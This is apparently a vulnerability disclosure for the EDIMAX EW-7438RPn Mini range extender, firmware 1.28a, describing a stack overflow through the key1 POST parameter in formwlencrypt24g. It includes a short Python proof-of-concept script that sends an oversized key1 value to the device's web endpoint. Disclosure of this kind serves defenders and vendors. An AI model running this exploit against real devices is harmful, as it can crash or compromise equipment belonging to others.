EDIMAX-EW-7438RPn Mini-formwlencrypt24g

Overview

The device's official website: https://www.edimax.com/edimax/download/download/data/edimax/global/download/product/wi-fi_range_extenders/wi-fi_range_extenders_n300/ew-7438rpn_mini/

Affected version

EW-7438RPn Mini Firmware 1.28a (Version : 1.28a)

Vulnerability details

The EDIMAX EW-7438RPn Mini Firmware 1.28a (Version : 1.28a) firmware has a stack overflow vulnerability in the formwlencrypt24g function. The function receives the key1 parameter from a POST request. However, since the user can control the input of these parameters, the statement strcpy(v53, v27) can cause a buffer overflow.

POC

import requests

ip = "192.168.153.2"

payload = "A" * 5000
data = {
    "wlenabled":      "yes",
    "ssid":           "TestAP",
    "method":         "1",
    "chan":            "6",
    "wpaCipher":      "1",
    "wepEnabled":     "ON",
    "length":         "1",
    "format":         "1",
    "defaultTxKeyId": "1",
    "key1":           payload,
    "pskFormat":      "0",
    "pskValue":       "",
    "submit-url":     "/wireless.asp",
    "CONN_TEST_TRUE": "",
}

url = f"http://{ip}/goform/formwlencrypt24g"

res = requests.post(url=url, data=data, verify=False)
print(res)